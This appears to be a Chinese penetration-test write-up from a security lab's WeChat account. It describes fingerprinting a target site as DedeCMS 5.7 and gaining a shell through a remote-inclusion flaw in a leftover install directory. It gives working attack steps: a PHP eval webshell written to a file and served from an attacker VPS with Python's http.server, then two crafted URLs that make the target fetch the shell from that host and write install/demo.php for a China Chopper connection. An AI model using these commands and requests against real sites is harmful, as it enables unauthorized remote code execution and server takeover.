从信息收集到getshell

我不涉生活的险，退而结茧

                                                        成吉思航

00x01 信息收集

        拿到目标url云悉指纹搞一波，指纹没匹对出来，回到网站

        虽然没匹对出指纹，但随便浏览个网页看到url总感觉是什么

那就谷歌一下

灵感不就来了，那么初步判断有可能是dedecms尝试了几个dedecms的目录，均是not found

既然是开源的，那我就去找下源码，看看

看到有个robots.txt,看一眼

还真有，那就匹对一下，八九不离十，在看看member还是没有，访问都没有结果，上个御剑扫一下目录看看，

看到个photo我觉得大有文章，访问一下

我的天啊，出来了，还真是dedecms，访问url确定一下：

没错了，确定为织梦CMS搭建的网站，那怎么确定用的织梦什么版本呢，我们可以这样判断

photo/data/admin/ver.txt

Google搜索一下，锁定一下版本应该为5.7左右

确定了版本之后，其实我们从前面的信息(容器版本:apache2.2,存在install文件)可以大致的锁定一个漏洞----织梦远程包含漏洞

00x02 Getshell

        利用条件：首先，是目标站安装完cms后并没有删除install文件夹，其次网站建站容器版本过低，当Apache检测到一个文件有多个扩展名时，如1.php.bak，会从右向左判断，直到有一个apache认识的扩展名。

我觉得基本稳了，开干。

在外网VPS创建一个文件dedecms/demodata.a.txt具体操作如下：1 mkdir dedecms2 echo "<?php @eval($_POST[cmd]);?>">dedecms/demodata.a.txt3 python3 -m http.server

访问如下url：

http://xxx.com/photo/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

http://xxx.com/photo/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=demo.php&updateHost=http://VPS/

如果成功的话，即可生成/install/demo.php，我觉得没问题了，上菜刀

手握日月摘星辰，安全路上永不止步。

                                                   - Khan攻防安全实验室

本文始发于微信公众号（Khan安全攻防实验室）：从信息收集到getshell